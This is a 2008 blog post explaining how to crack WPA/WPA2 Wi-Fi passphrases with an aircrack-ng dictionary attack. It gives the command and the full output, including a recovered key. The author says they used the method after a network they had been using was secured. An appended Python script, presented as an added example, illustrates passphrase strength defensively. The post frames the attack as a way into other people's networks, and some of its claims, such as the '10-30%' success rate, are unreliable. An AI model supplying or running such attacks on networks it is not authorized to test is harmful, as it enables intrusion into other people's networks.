Friday, March 14, 2008

WPA cracking

WHAT IS WPA?

WPA (Wi-Fi Protected Access) is a security method used by wireless networks. WPA encrypts the information that is sent between computers on a wireless network and authenticates users to help ensure that only authorized people can access the network.

WPA was created to improve on the security of WEP. Like WEP, WPA encrypts information, but it also checks to make sure that the network security key has not been modified. WPA also authenticates users to help ensure that only authorized people can access the network. If your networking hardware works with both WEP and WPA security, use WPA.

There are two types of WPA authentication: WPA and WPA2. WPA is designed to work with all wireless network adapters, but it might not work with older routers or access points. WPA2 is more secure than WPA, but it will not work with some older network adapters. WPA is designed to be used with an 802.1X authentication server, which distributes a different key to each user; this is referred to as WPA-Enterprise or WPA2-Enterprise. It can also be used in a pre-shared key (PSK) mode, where every user is given the same passphrase; this is referred to as WPA-Personal or WPA2-Personal.

A few terms:
WEP: Wired Equivalent Privacy
WPA: Wi-Fi Protected Access

HOW TO CRACK WPA?

Now on to cracking WPA/WPA2 passphrases. Aircrack-ng can crack either type.

aircrack-ng -w password.lst *.cap
Where:
-w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.
*.cap is the name of the group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

The program responds:
Opening wpa2.eapol.cap
Opening wpa.cap
Read 18 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 Harkonen WPA (1 handshake)
2 00:0D:93:EB:B0:8C test WPA (1 handshake)

Index number of target network ?

Notice in this case that since there are multiple networks we need to select which one to attack. We select number 2. The program then responds:
Aircrack-ng 0.7 r130


[00:00:03] 230 keys tested (73.41 k/s)


KEY FOUND! [ biscotte ]


Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE

Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD

EAPOL HMAC : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD

Now you have the passphrase and can connect to the network.

It's in my knowledge because I have faced a problem personally regarding this: I used to get Wi-Fi access which was unsecured at first, then it was later made security-enabled, so I had to try my hands on this information. Hope it clarifies your doubt...
NOTE:
It can only be cracked by the dictionary method: a candidate passphrase from the word list is confirmed when the master key and transient key derived from it reproduce the EAPOL HMAC of the captured handshake, and only then does the program report the passphrase.
Because WPA uses a passphrase rather than a password, the success rate of this method is only around 10-30%.
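The note above is the defender's takeaway: the "Master Key" in the aircrack-ng output is derived from the passphrase and the SSID by a deliberately slow key-stretching function, so the only way in is to guess passphrases one at a time at the rate shown (73.41 k/s). The following Python script is an added example, not code from the post or from the Aircrack-ng project. It derives the WPA-Personal master key with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as salt, as IEEE 802.11i specifies) using the standard library, and estimates how long a guessing attack at the post's rate would take to exhaust a passphrase's keyspace. The passphrase "biscotte" and the SSIDs come from the post's output; the 20-character passphrase and the per-class charset sizes are constructed for the illustration.

```python
import hashlib
import math

# Parameters fixed by the WPA/WPA2-Personal specification (IEEE 802.11i).
PBKDF2_ITERATIONS = 4096
PMK_LENGTH_BYTES = 32

# Guessing rate taken from the aircrack-ng output in the post (73.41 k/s).
POST_KEYS_PER_SECOND = 73410.0


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key (the 'Master Key' line in the post's
    output) from a WPA-Personal passphrase and the network's SSID.

    PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 256-bit output.
    The SSID salt means the same passphrase yields a different key on
    every differently named network, which defeats precomputed tables
    for networks that do not keep a common default SSID.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("ascii"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        PMK_LENGTH_BYTES,
    )


def keyspace(charset_size: int, length: int) -> int:
    """Number of candidate passphrases of a given length over a charset."""
    return charset_size ** length


def seconds_to_exhaust(charset_size: int, length: int,
                       keys_per_second: float = POST_KEYS_PER_SECOND) -> float:
    """Worst-case time to try every candidate at the given derivation rate."""
    return keyspace(charset_size, length) / keys_per_second


def passphrase_report(passphrase: str, ssid: str,
                      keys_per_second: float = POST_KEYS_PER_SECOND) -> dict:
    """Summarise how a passphrase fares against a guessing attack.

    The charset estimate is generous to the attacker: it counts only the
    character classes actually present in the passphrase (constructed
    class sizes: 26 lower, 26 upper, 10 digits, 33 other printable ASCII).
    """
    charset_size = (
        any(c.islower() for c in passphrase) * 26
        + any(c.isupper() for c in passphrase) * 26
        + any(c.isdigit() for c in passphrase) * 10
        + any(not c.isalnum() for c in passphrase) * 33
    )
    pmk = derive_pmk(passphrase, ssid)
    secs = seconds_to_exhaust(charset_size, len(passphrase), keys_per_second)
    return {
        "pmk_hex": pmk.hex(),
        "charset_size": charset_size,
        "entropy_bits": round(len(passphrase) * math.log2(charset_size), 1),
        "days_to_exhaust": secs / 86400,
    }


if __name__ == "__main__":
    # The passphrase the post recovered, against both SSIDs from its output.
    for ssid in ("test", "Harkonen"):
        print(ssid, passphrase_report("biscotte", ssid))
    # A constructed 20-character mixed-class passphrase for comparison.
    print("strong", passphrase_report("k7$Qm2!vLp9#ZxR4wT8e", "test"))
```

Running it shows why the post's dictionary succeeded: an 8-letter lowercase word has about 37.6 bits of entropy and its whole keyspace falls in roughly a month at the post's rate, and a real dictionary is far smaller than that keyspace. The 20-character mixed passphrase is out of reach of exhaustive guessing at any rate, and the PMK for "biscotte" differs between the "test" and "Harkonen" networks even though the passphrase is the same.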
